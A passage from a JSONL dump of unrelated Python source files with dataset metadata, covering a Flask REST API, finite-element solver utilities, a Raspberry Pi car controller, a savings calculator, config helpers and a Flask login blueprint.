df\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474572125","text":"import os\nimport sys\nimport inspect\n\n# Get the current folder, which is the input folder\ncurrent_folder = os.path.realpath(\n os.path.abspath(\n os.path.split(\n inspect.getfile(\n inspect.currentframe()\n )\n )[0]\n )\n)\nfolder_parts = current_folder.split(os.sep)\nprevious_folder = os.sep.join(folder_parts[0:-2])\nsys.path.insert(0, current_folder)\nsys.path.insert(0, previous_folder)\n\nimport json\nfrom flask_restful import Resource,marshal_with, fields ,request, Api\nfrom flask_json import FlaskJSON, JsonError, json_response, as_json\n\n# pip install Flask-JSON\n\nresource_fields = {\n 'id_perfil_modulo':fields.Integer,\n 'id_perfil':fields.Integer,\n 'id_modulo':fields.Integer,\n 'enabled':fields.Integer,\n 'creado_por':fields.String,\n 'modificado_por':fields.String,\n}\n\nfrom stopwords.common import PerfilModuloItem\nfrom stopwords.bus import PerfilModuloBus\nfrom stopwords.bus import ErrorBus\n\nfrom .customException import CustomException\nfrom .support_jsonp import support_jsonp_custom\nfrom .support_jsonp import support_jsonp_ok\n\n\nperfilmodulo=PerfilModuloBus()\nitem=PerfilModuloItem()\nerror=ErrorBus()\n\nclass PerfilModuloList(Resource,CustomException):\n def get(self):\n try:\n data= perfilmodulo.getAll()\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def post(self):\n try:\n item.id_perfil=request.form['id_perfil']\n item.id_modulo=request.form['id_modulo']\n item.creado_por='test'\n if request.form['enabled'].upper() == 'TRUE':\n item.enabled=1\n else:\n item.enabled=0\n \n res=perfilmodulo.insert(item)\n message=error.getErrorMessage('','A0009',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message)\n except Exception as err:\n return self.showCustomException(err,request.args)\n\n\nclass PerfilModulo(Resource,CustomException):\n def get(self, id):\n try:\n data= perfilmodulo.getById(id)\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def delete(self, id):\n try:\n res=perfilmodulo.delete(id)\n message=error.getErrorMessage('','A0007',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def put(self,id):\n try:\n item.id_perfil_modulo=id\n item.id_perfil=request.form['id_perfil']\n item.id_modulo=request.form['id_modulo']\n item.modificado_por='test'\n res=perfilmodulo.update(item) \n message=error.getErrorMessage('','A0008',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message) \n except Exception as err:\n return self.showCustomException(err,request.args)\n\nclass PerfilModuloByPerfil(Resource,CustomException):\n def get(self, id):\n try:\n data= perfilmodulo.getByIdPerfil(id)\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return self.showCustomException(err,request.args)","sub_path":"api/perfilModulo.py","file_name":"perfilModulo.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361585214","text":"\"\"\"This module contains utility functions such as convenient access to\nSciPy linear solvers.\"\"\"\n\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy.sparse.linalg as spl\nimport scipy.sparse.csgraph as spg\nimport warnings\nfrom skfem.assembly import asm, bilinear_form, linear_form, Dofs\nfrom skfem.element import ElementVectorH1\nfrom typing import Optional, Union, Tuple, Callable\nfrom numpy import ndarray\nfrom scipy.sparse import spmatrix\nfrom skfem.assembly.global_basis import GlobalBasis\n\n\nLinearSolver = Callable[[spmatrix, ndarray], ndarray]\nEigenSolver = Callable[[spmatrix, spmatrix], Tuple[ndarray, ndarray]]\n# complex type for describing the return value of :func:`skfem.utils.condense`\nCondensedSystem = Union[spmatrix,\n Tuple[spmatrix, ndarray],\n Tuple[spmatrix, spmatrix],\n Tuple[spmatrix, ndarray, ndarray],\n Tuple[spmatrix, ndarray, ndarray, ndarray],\n Tuple[spmatrix, spmatrix, ndarray, ndarray]]\n\n\ndef condense(A: spmatrix,\n b: Optional[Union[ndarray, spmatrix]] = None,\n x: Optional[ndarray] = None,\n I: Optional[Union[ndarray, Dofs]] = None,\n D: Optional[Union[ndarray, Dofs]] = None,\n expand: bool = True) -> CondensedSystem:\n \"\"\"Eliminate DOF's from a linear system.\n\n Supports also generalized eigenvalue problems.\n\n Parameters\n ----------\n A\n The system matrix\n b\n The right hand side vector or the mass matrix for generalized\n eigenvalue problems.\n x\n The values of the condensed DOF's. If not given, assumed to be zero.\n I\n The set of DOF numbers to keep. If :class:`skfem.assembly.Dofs` object\n is given, then it's flattened via :meth:`skfem.assembly.Dofs.all`.\n D\n The set of DOF numbers to dismiss. If :class:`skfem.assembly.Dofs`\n object is given, then it's flattened via\n :meth:`skfem.assembly.Dofs.all`.\n expand\n If True, return x and I: :func:`skfem.utils.solve` will then expand the\n solution vector automatically. By default, the solution vector is not\n expanded.\n\n Returns\n -------\n spmatrix or (spmatrix, ndarray) or (spmatrix, spmatrix)\n The condensed system.\n\n \"\"\"\n if isinstance(D, Dofs):\n D = D.all()\n\n if isinstance(I, Dofs):\n I = I.all()\n\n if x is None:\n x = np.zeros(A.shape[0])\n\n if I is None and D is None:\n raise Exception(\"Either I or D must be given!\")\n elif I is None and D is not None:\n I = np.setdiff1d(np.arange(A.shape[0]), D)\n elif D is None and I is not None:\n D = np.setdiff1d(np.arange(A.shape[0]), I)\n else:\n raise Exception(\"Give only I or only D!\")\n\n if b is None:\n ret_value = (A[I].T[I].T,)\n else:\n if isinstance(b, spmatrix):\n # generalized eigenvalue problem: don't modify rhs\n Aout = A[I].T[I].T\n bout = b[I].T[I].T\n elif isinstance(b, ndarray):\n Aout = A[I].T[I].T\n bout = b[I] - A[I].T[D].T @ x[D]\n else:\n raise Exception(\"The second arg type not supported.\")\n ret_value = (Aout, bout)\n\n if expand:\n ret_value += (x, I)\n\n return ret_value if len(ret_value) > 1 else ret_value[0]\n\n\ndef rcm(A: spmatrix,\n b: ndarray) -> Tuple[spmatrix, ndarray, ndarray]:\n p = spg.reverse_cuthill_mckee(A, symmetric_mode=False)\n return A[p].T[p].T, b[p], p\n\n\ndef solver_eigen_scipy(sigma: float,\n n: Optional[int] = 3,\n mode: Optional[str] = 'normal') -> EigenSolver:\n \"\"\"Solve generalized eigenproblem using SciPy (ARPACK).\n\n Parameters\n ----------\n sigma\n The parameter for spectral shift, choose a value near the\n expected eigenvalues.\n n\n The number of eigenpairs to solve.\n\n Returns\n -------\n EigenSolver\n A solver function that can be passed to :func:`solve`.\n\n \"\"\"\n def solver(K, M):\n from scipy.sparse.linalg import eigsh\n return eigsh(K, k=n, M=M, sigma=sigma, mode=mode)\n return solver\n\n\ndef solver_direct_scipy() -> LinearSolver:\n def solver(A, b):\n return spl.spsolve(A, b)\n return solver\n\n\ndef solver_direct_umfpack() -> LinearSolver:\n \"\"\"SciPy interface to umfpack.\"\"\"\n def solver(A, b):\n return spl.spsolve(A, b, use_umfpack=True)\n return solver\n\n\ndef build_pc_ilu(A: spmatrix,\n drop_tol: Optional[float] = 1e-4,\n fill_factor: Optional[float] = 20) -> spl.LinearOperator:\n \"\"\"Incomplete LU preconditioner.\"\"\"\n P = spl.spilu(A.tocsc(), drop_tol=drop_tol, fill_factor=fill_factor)\n M = spl.LinearOperator(A.shape, matvec=P.solve)\n return M\n\n\ndef build_pc_diag(A: spmatrix) -> spmatrix:\n \"\"\"Diagonal preconditioner.\"\"\"\n return sp.spdiags(1.0/A.diagonal(), 0, A.shape[0], A.shape[0])\n\n\ndef solver_iter_krylov(krylov: Optional[LinearSolver] = spl.cg,\n verbose: Optional[bool] = False,\n **kwargs) -> LinearSolver:\n \"\"\"Krylov-subspace iterative linear solver.\n\n Parameters\n ----------\n krylov\n A Krylov iterative linear solver, like, and by default,\n :func:`scipy.sparse.linalg.cg`\n verbose\n If True, print the norm of the iterate.\n\n Any remaining keyword arguments are passed on to the solver, in\n particular x0, the starting guess, and M, the preconditioner. If\n the latter is omitted, a diagonal preconditioner is supplied using\n :func:`skfem.utils.build_pc_diag`.\n\n Returns\n -------\n LinearSolver\n A solver function that can be passed to :func:`solve`.\n\n \"\"\"\n def callback(x):\n if verbose:\n print(np.linalg.norm(x))\n\n def solver(A, b):\n if 'M' not in kwargs:\n kwargs['M'] = build_pc_diag(A)\n sol, info = krylov(A, b, **{'callback': callback, **kwargs})\n if info > 0:\n warnings.warn(\"Convergence not achieved!\")\n elif info == 0 and verbose:\n print(f\"{krylov.__name__} converged to \"\n + f\"tol={kwargs.get('tol', 'default')} and \"\n + f\"atol={kwargs.get('atol', 'default')}\")\n return sol\n\n return solver\n\n\ndef solver_iter_pcg(**kwargs) -> LinearSolver:\n \"\"\"Conjugate gradient solver, specialized from solver_iter_krylov\"\"\"\n return solver_iter_krylov(spl.cg, **kwargs)\n\n\ndef solve(A: spmatrix,\n b: Union[ndarray, spmatrix],\n x: Optional[ndarray] = None,\n I: Optional[ndarray] = None,\n solver: Optional[Union[LinearSolver, EigenSolver]] = None) -> ndarray:\n \"\"\"Solve a linear system or a generalized eigenvalue problem.\n\n Parameters\n ----------\n A\n The system matrix\n b\n The right hand side vector or the mass matrix of a generalized\n eigenvalue problem.\n solver\n Choose one of the following solvers:\n\n - :func:`skfem.utils.solver_direct_scipy` (default)\n - :func:`skfem.utils.solver_eigen_scipy` (default)\n - :func:`skfem.utils.solver_direct_umfpack`\n - :func:`skfem.utils.solver_iter_pcg`\n\n \"\"\"\n if solver is None:\n if isinstance(b, spmatrix):\n solver = solver_eigen_scipy(10.0)\n return solver(A, b)\n elif isinstance(b, ndarray):\n solver = solver_direct_scipy()\n\n if x is not None and I is not None:\n y = x.copy()\n y[I] = solver(A, b)\n return y\n else:\n return solver(A, b)\n\n\ndef adaptive_theta(est, theta=0.5, max=None):\n if max is None:\n return np.nonzero(theta*np.max(est) < est)[0]\n else:\n return np.nonzero(theta*max < est)[0]\n\n\ndef derivative(x: ndarray,\n basis1: GlobalBasis,\n basis0: GlobalBasis,\n i: Optional[int] = 0) -> ndarray:\n \"\"\"Calculate the i'th partial derivative through projection.\n\n Parameters\n ----------\n x\n The solution vector.\n basis1\n The basis corresponding to the solution x (e.g. P_1).\n basis0\n The basis corresponding to the derivative field (e.g. P_0).\n i\n Return i'th partial derivative.\n\n Returns\n -------\n ndarray\n A new solution vector corresponding to the derivative.\n\n \"\"\"\n\n @bilinear_form\n def deriv(u, du, v, dv, w):\n return du[i]*v\n\n @bilinear_form\n def mass(u, du, v, dv, w):\n return u*v\n\n A = asm(deriv, basis1, basis0)\n M = asm(mass, basis0)\n\n return solve(M, A @ x)\n\n\ndef L2_projection(fun,\n basis: GlobalBasis,\n ix: Optional[ndarray] = None) -> ndarray:\n \"\"\"Initialize a solution vector with L2 projection.\n\n Parameters\n ----------\n fun\n The function to project.\n basis\n The finite element basis\n ix\n Do the projection only on a subset of DOF's.\n\n Returns\n -------\n ndarray\n The projected solution vector.\n\n \"\"\"\n\n if ix is None:\n ix = np.arange(basis.N)\n\n @bilinear_form\n def mass(u, du, v, dv, w):\n p = u * v\n return sum(p) if isinstance(basis.elem, ElementVectorH1) else p\n\n @linear_form\n def funv(v, dv, w):\n p = fun(*w.x) * v\n return sum(p) if isinstance(basis.elem, ElementVectorH1) else p\n\n M = asm(mass, basis)\n f = asm(funv, basis)\n\n return solve(*condense(M, f, I=ix, expand=False))\n","sub_path":"skfem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371957401","text":"\nE = 50000\nI = 100000\nS = I - E\nIR = 0.09\nDR = 0.02\nC = list(range(1))\nC[0] = S\nBE = list(range(1))\n\ne = input('Manual Entry [Y/N]: ') \n\nif e == 'y' :\n\tE = int(input('Expense: '))\n\tI = int(input('Input: '))\n\tC[0] = I - E + int(input('Initial Capital: '))\n\nx = 0\nwhile BE[x] <= 0 :\n\tx += 1\n\tC.append(round(C[x - 1] * (1 + IR) + S))\n\tBE.append(round(C[x -1] * DR - E))\n\tBEC = round(C[x]/1000, 2)\n\tprint('Year: ' + str(x) + ' Balance: ' + str(BE[x]/1000) + 'K GBP ' + 'Capital: ' + str(BEC) + 'K GBP.')\n\nBEC = round(C[x]/1000000, 2)\n\nprint('\\nBreakeven is at year ' + str(x) + ' with a capital of ' + str(BEC) + 'MM GBP.\\n')\n","sub_path":"SavingsCalculator.py","file_name":"SavingsCalculator.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328369560","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\n\nCURRENT_DIR = os.path.dirname( os.path.abspath(__file__) )\nPROJECT_DIR = os.path.join(CURRENT_DIR, '../')\n\n\n# The Way of the Voice\nsys.path.append( PROJECT_DIR )\n\nfrom utility.shape import multi, plain\nfrom subspack.event import TimeFormat\n\n\nshape = (2, 3)\nplain_index = 19\nmulti_index = (3, 0, 1)\nprint( multi(shape, plain_index) )\nprint( plain(shape, multi_index) )\n\n\ntime_str = '0:11:22.33'\n\nformatter = TimeFormat('SSA')\nfrom_str = formatter.from_str(time_str)\n\nprint( from_str )\n\n","sub_path":"learning/parsingtime.py","file_name":"parsingtime.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312418624","text":"#!usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport RPi.GPIO as GPIO\nimport RaspberryCar_pb2\nimport time\nimport threading\n\n# 简化高低电平信号\nS_H = GPIO.HIGH\nS_L = GPIO.LOW\n\n# 定义信号接口gpio口\n\n# L298N 电机控制\nL298N_IN1 = 35\nL298N_IN2 = 36\nL298N_IN3 = 37\nL298N_IN4 = 38\n\n# 继电器\nJD_IN1 = 11\nJD_IN2 = 13\n\n# 舵机\nSG90_H = 12\nSG90_V = 16\n\n# 超声波距离检测\nTRIG = 18\nECHO = 15\n\n# 红外障碍检测\nIR_OUT1 = 22\nIR_OUT2 = 24\nIR_OUT3 = 26\nIR_OUT4 = 28\n\n\nclass Car(object):\n \"\"\"docstring for Car\"\"\"\n\n def __init__(self):\n super(Car, self).__init__()\n # 初始化服务器模型\n self.server_model = RaspberryCar_pb2.RCSocketServerModel()\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Shutoff\n self.server_model.carInfo.forwardBarrier = False\n self.server_model.carInfo.leftwardBarrier = False\n self.server_model.carInfo.rightwardBarrier = False\n # 设置 gpio 口的模式\n GPIO.setmode(GPIO.BOARD)\n # L298N Pin 口初始化\n GPIO.setup(L298N_IN1, GPIO.OUT)\n GPIO.setup(L298N_IN2, GPIO.OUT)\n GPIO.setup(L298N_IN3, GPIO.OUT)\n GPIO.setup(L298N_IN4, GPIO.OUT)\n # 继电器\n GPIO.setup(JD_IN1, GPIO.OUT)\n GPIO.setup(JD_IN2, GPIO.OUT)\n # 舵机\n GPIO.setup(SG90_H, GPIO.OUT, initial=False)\n self.pwm_h = GPIO.PWM(SG90_H, 50) # 50HZ\n self.pwm_h.start(0)\n GPIO.setup(SG90_V, GPIO.OUT, initial=False)\n self.pwm_v = GPIO.PWM(SG90_V, 50) # 50HZ\n self.pwm_v.start(0)\n # 超声波距离检测\n GPIO.setup(TRIG, GPIO.OUT)\n GPIO.setup(ECHO, GPIO.IN)\n # 红外障碍检测\n GPIO.setup(IR_OUT1, GPIO.IN)\n GPIO.setup(IR_OUT2, GPIO.IN)\n GPIO.setup(IR_OUT3, GPIO.IN)\n GPIO.setup(IR_OUT4, GPIO.IN)\n\n self.forward_barrier_lock = threading.Lock()\n self.supersonic_wave_thread = threading.Thread(target=self.loop_supersonic_wave, name=\"supersonic_wave_thread\")\n self.supersonic_wave_thread.start()\n\n self.camera_lock = threading.Lock()\n self.camera_h_enable = False\n self.camera_h_thread = threading.Thread(target=self.loop_camera_h, name=\"camera_h_thread\")\n self.camera_h_thread.start()\n self.camera_v_enable = False\n self.camera_v_thread = threading.Thread(target=self.loop_camera_v, name=\"camera_v_thread\")\n self.camera_v_thread.start()\n\n # 需要循环获取的状态\n def loop_supersonic_wave(self):\n while True:\n GPIO.output(TRIG, 0)\n time.sleep(0.01)\n GPIO.output(TRIG, 1)\n time.sleep(0.00001)\n GPIO.output(TRIG, 0)\n start_time = time.time()\n stop_time = 0\n while GPIO.input(ECHO) == 0:\n start_time = time.time()\n while GPIO.input(ECHO) == 1:\n stop_time = time.time()\n distance = (stop_time - start_time) * 34000 / 2 # 声波的速度是340m/s\n self.forward_barrier_lock.acquire()\n self.server_model.carInfo.forwardBarrier = (distance <= 10)\n self.forward_barrier_lock.release()\n if (self.server_model.carInfo.forwardBarrier is True) and \\\n (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Forward):\n self.stop()\n if (GPIO.input(IR_OUT1) is False or GPIO.input(IR_OUT2) is False) \\\n and (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Leftward):\n self.stop()\n if (GPIO.input(IR_OUT3) is False or GPIO.input(IR_OUT4) is False) \\\n and (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Rightward):\n self.stop()\n\n def loop_camera_h(self):\n while self.camera_h_enable is True:\n for i in range(0, 181, 10):\n self.pwm_h.ChangeDutyCycle(2.5 + 10 * i / 180) # 设置转动角度\n time.sleep(0.02) # 等该20ms周期结束\n self.pwm_h.ChangeDutyCycle(0) # 归零信号\n time.sleep(0.2)\n for i in range(181, 0, -10):\n self.pwm_h.ChangeDutyCycle(2.5 + 10 * i / 180)\n time.sleep(0.02)\n self.pwm_h.ChangeDutyCycle(0)\n time.sleep(0.2)\n\n def loop_camera_v(self):\n while self.camera_v_enable is True:\n for i in range(90, 181, 10):\n self.pwm_v.ChangeDutyCycle(2.5 + 10 * i / 180) # 设置转动角度\n time.sleep(0.02) # 等该20ms周期结束\n self.pwm_v.ChangeDutyCycle(0) # 归零信号\n time.sleep(0.2)\n for i in range(181, 90, -10):\n self.pwm_v.ChangeDutyCycle(2.5 + 10 * i / 180)\n time.sleep(0.02)\n self.pwm_v.ChangeDutyCycle(0)\n time.sleep(0.2)\n\n # 处理控制命令\n def handle_control(self, control):\n if control == RaspberryCar_pb2.Control_None:\n pass\n elif control == RaspberryCar_pb2.Control_Shutdown:\n self.shut_down()\n elif control == RaspberryCar_pb2.Control_Bootup:\n self.bootup()\n elif control == RaspberryCar_pb2.Control_Forward:\n self.forward()\n elif control == RaspberryCar_pb2.Control_Backward:\n self.backward()\n elif control == RaspberryCar_pb2.Control_Leftward:\n self.leftward()\n elif control == RaspberryCar_pb2.Control_Rightward:\n self.rightward()\n elif control == RaspberryCar_pb2.Control_CarStop:\n self.stop()\n elif control == RaspberryCar_pb2.Control_Camera_Horizontal:\n self.camera_lock.acquire()\n self.camera_h_enable = True\n self.camera_lock.release()\n elif control == RaspberryCar_pb2.Control_Camera_Vertical:\n self.camera_lock.acquire()\n self.camera_v_enable = True\n self.camera_lock.release()\n elif control == RaspberryCar_pb2.Control_Camera_Stop:\n self.camera_lock.acquire()\n self.camera_h_enable = False\n self.camera_v_enable = False\n self.camera_lock.release()\n\n # 启动小车电源\n def bootup(self):\n GPIO.output(JD_IN1, S_L)\n GPIO.output(JD_IN2, S_H)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Stop\n\n # 关闭小车电源\n def shut_down(self):\n GPIO.output(JD_IN1, S_L)\n GPIO.output(JD_IN2, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Shutoff\n\n # 停止\n def stop(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Stop\n\n # 前进\n def forward(self):\n GPIO.output(L298N_IN1, S_H)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_H)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Forward\n\n # 后退\n def backward(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_H)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_H)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Backward\n\n # 左转\n def leftward(self):\n GPIO.output(L298N_IN1, S_H)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Leftward\n\n # 右转\n def rightward(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_H)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Rightward\n\n # 设置小车部分参数\n def update_car_info(self, socket_client_model, host):\n self.server_model.reqChannel = socket_client_model.reqChannel\n self.server_model.socketVersion = socket_client_model.socketVersion\n self.server_model.reqType = socket_client_model.reqType\n self.server_model.reqId = socket_client_model.reqId\n self.server_model.carInfo.ipAddress = host\n self.server_model.carInfo.cameraUrl = \"http://\" + host + \"/?action=stream\"\n\n # 获取小车状态\n def get_car_status(self):\n return self.server_model.SerializeToString() + \"\\r\\n\"\n\n","sub_path":"PythonServer/Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410555001","text":"import logging\nimport warnings\nfrom collections.abc import Iterable, Sequence\nfrom numbers import Integral, Number\n\ntry:\n import torch\n from torch.utils.data import DataLoader\n\n has_torch = True\nexcept ImportError:\n has_torch = False\n\n\nLOGGING_FORMATTER = logging.Formatter(\"%(asctime)s|%(name)s|%(levelname)s| %(message)s\")\n\n\ndef setup_logger(logger, level=logging.INFO):\n \"\"\"DEPRECATED. Resets formatting and stdout stream handler to the logger\n\n Args:\n logger: logger from `logging` module\n level: logging verbosity level\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n if logger.hasHandlers():\n for h in list(logger.handlers):\n logger.removeHandler(h)\n\n logger.setLevel(level)\n\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(level)\n ch.setFormatter(LOGGING_FORMATTER)\n logger.addHandler(ch)\n\n\ndef add_logger_filehandler(logger, filepath):\n \"\"\"DEPRECATED. Adds additional file handler to the logger\n\n Args:\n logger: logger from `logging` module\n filepath: output logging file\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n # create file handler which logs even debug messages\n fh = logging.FileHandler(filepath)\n fh.setLevel(logger.level)\n fh.setFormatter(LOGGING_FORMATTER)\n logger.addHandler(fh)\n\n\ndef set_seed(seed):\n \"\"\"DEPRECATED. Setup seed for numpy, random, torch\n\n Args:\n seed (int): any integer random seed\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n import random\n import numpy as np\n import torch\n\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n\ndef assert_config(config, required_fields):\n \"\"\"DEPRECATED. Method to check the config if it has required fields of specified type\n\n Args:\n config: Configuration object to check\n required_fields (Sequence of (str, type)): Required attributes that should exist in the configuration.\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n if not isinstance(required_fields, Sequence):\n raise TypeError(\n \"Argument required_fields should be a Sequence of (str, type), \"\n \"but given {}\".format(type(required_fields))\n )\n for field in required_fields:\n if not (isinstance(field, Sequence) and len(field) == 2):\n raise ValueError(\"Entries of required_fields should be (str, type), but given {}\".format(type(field)))\n k, t = field\n obj = getattr(config, k, None)\n if obj is None:\n raise ValueError(\"Config should have attribute: {} of type {}\".format(k, t))\n if t is not None:\n if not isinstance(obj, t):\n raise TypeError(\"config.{} should be of type {}, but given {}\".format(k, t, type(obj)))\n\n\ndef get_params(config, required_fields):\n \"\"\"Method to convert configuration into a dictionary matching `required_fields`.\n\n Args:\n config: configuration object\n required_fields (Sequence of (str, type)): Required attributes that should exist in the configuration.\n For example, `((\"a\", (int, str)), (\"b\", str),)`\n\n Returns:\n a dictionary\n\n \"\"\"\n assert_config(config, required_fields)\n params = {}\n for k, _ in required_fields:\n obj = getattr(config, k)\n k = k.replace(\"_\", \" \")\n if isinstance(obj, (Number, str, bool)):\n params[k] = obj\n elif hasattr(obj, \"__len__\"):\n params[k] = len(obj)\n if hasattr(obj, \"batch_size\"):\n params[\"{} batch size\".format(k)] = obj.batch_size\n elif hasattr(obj, \"__class__\"):\n params[k] = obj.__class__.__name__\n\n return params\n\n\nBASE_CONFIG = (\n (\"seed\", Integral),\n (\"debug\", bool),\n)\n\n\nif has_torch:\n\n TORCH_DL_BASE_CONFIG = BASE_CONFIG + (\n (\"device\", str),\n (\"model\", torch.nn.Module),\n )\n\n TRAIN_CONFIG = TORCH_DL_BASE_CONFIG + (\n (\"train_loader\", (DataLoader, Iterable)),\n (\"num_epochs\", Integral),\n (\"criterion\", torch.nn.Module),\n (\"optimizer\", torch.optim.Optimizer),\n )\n\n TRAINVAL_CONFIG = TRAIN_CONFIG + (\n (\"train_eval_loader\", (DataLoader, Iterable)),\n (\"val_loader\", (DataLoader, Iterable)),\n (\"lr_scheduler\", object),\n )\n\n INFERENCE_CONFIG = TORCH_DL_BASE_CONFIG + (\n (\"data_loader\", (DataLoader, Iterable)),\n (\"weights\", str),\n (\"training_run_uuid\", str),\n )\n","sub_path":"py_config_runner/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213103017","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport re\nfrom collections import Counter\n\n\ndef main():\n\n counting_str = 'ccccdaababbbccccdd'\n\n slice_num = 3\n result = count_str_chars(counting_str, slice_num)\n\n print(result)\n\n\ndef count_str_chars(counting_str: str, slice_num: int) -> str:\n\n assert isinstance(counting_str, str)\n assert isinstance(slice_num, int)\n\n prepared_str = prepare_str(counting_str)\n sorted_chars_str = sort_chars(prepared_str)\n frequent_chars = get_frequent_chars(sorted_chars_str, slice_num)\n\n return frequent_chars\n\n\ndef prepare_str(input_str: str) -> str:\n\n output = re.sub(r'\\s*', '', input_str)\n\n return output.lower()\n\n\ndef sort_chars(input_str: str) -> str:\n\n sorted_alphabetic = ''.join(sorted(input_str))\n\n counted_chars = Counter(sorted_alphabetic)\n\n sorted_list_of_tuples_chars = counted_chars.most_common()\n sorted_list_chars = [item[0] for item in sorted_list_of_tuples_chars]\n\n return ''.join(sorted_list_chars)\n\n\ndef get_frequent_chars(slice_str: str, slice_index: int) -> str:\n return slice_str[0: slice_index]\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"count_chars/count_chars.py","file_name":"count_chars.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"96392891","text":"from collections import Counter\n\n\"\"\"\nhttps://leetcode.com/problems/minimum-window-substring\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n O(n) 안에 슬라이딩 윈도우 중에서도 주어진 문자열들을 지정 횟수만큼 가지는 최소 윈도우를 찾는 문제\n 투 포인터로 푸는 방향 생각하기\n 답안 참조했으니 나중에 다시 풀어보기\n \"\"\"\n def minWindow(self, s: str, t: str) -> str:\n\n need = Counter(t)\n missing = len(t)\n\n left_idx = start_idx = end_idx = 0\n\n for right_idx, v in enumerate(s, 1):\n\n if need[v] > 0:\n missing -= 1\n need[v] -= 1\n\n if missing == 0:\n\n # 윈도우 왼쪽이 불필요한 문자가 아닐때까지 왼쪽을 전진\n while left_idx < right_idx and need[s[left_idx]] < 0:\n need[s[left_idx]] += 1\n left_idx += 1\n\n # 짧은 구간 갱신\n if end_idx == 0 or end_idx - start_idx >= right_idx - left_idx:\n start_idx = left_idx\n end_idx = right_idx\n\n # 왼쪽을 강제 1보 전진\n need[s[left_idx]] += 1\n left_idx += 1\n missing += 1\n\n return s[start_idx: end_idx]\n","sub_path":"archive-dhkim/leetcode/ch20_sliding_window/prob76_minimum-window-substring.py","file_name":"prob76_minimum-window-substring.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"161057719","text":"from flask import Blueprint, render_template, url_for, request, flash, redirect, session\nfrom werkzeug.security import check_password_hash\nfrom werkzeug.utils import secure_filename\nfrom models.user import User\nfrom models.images import Image\nfrom models.follows import FollowerFollowing\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom instagram_web.util.s3_uploader import upload_file_to_s3\nfrom instagram_web.util.google_auth import oauth\n# from\nsessions_blueprint = Blueprint('sessions',\n __name__,\n template_folder='templates')\n\n\n@sessions_blueprint.route('/', methods=['GET'])\ndef index():\n return render_template('sessions/login.html')\n\n\n@sessions_blueprint.route('/verify', methods=['POST'])\ndef verif_login():\n username_get = User.get_or_none(User.name == request.form.get('user_name'))\n if username_get and check_password_hash(username_get.password, request.form.get('password')):\n login_user(username_get)\n flash('you are logged in!', 'success')\n # session['user'] = username_get.name\n return redirect(url_for('sessions.new'))\n else:\n flash(\"username and/or password is incorrect, please try again\", \"danger\")\n return 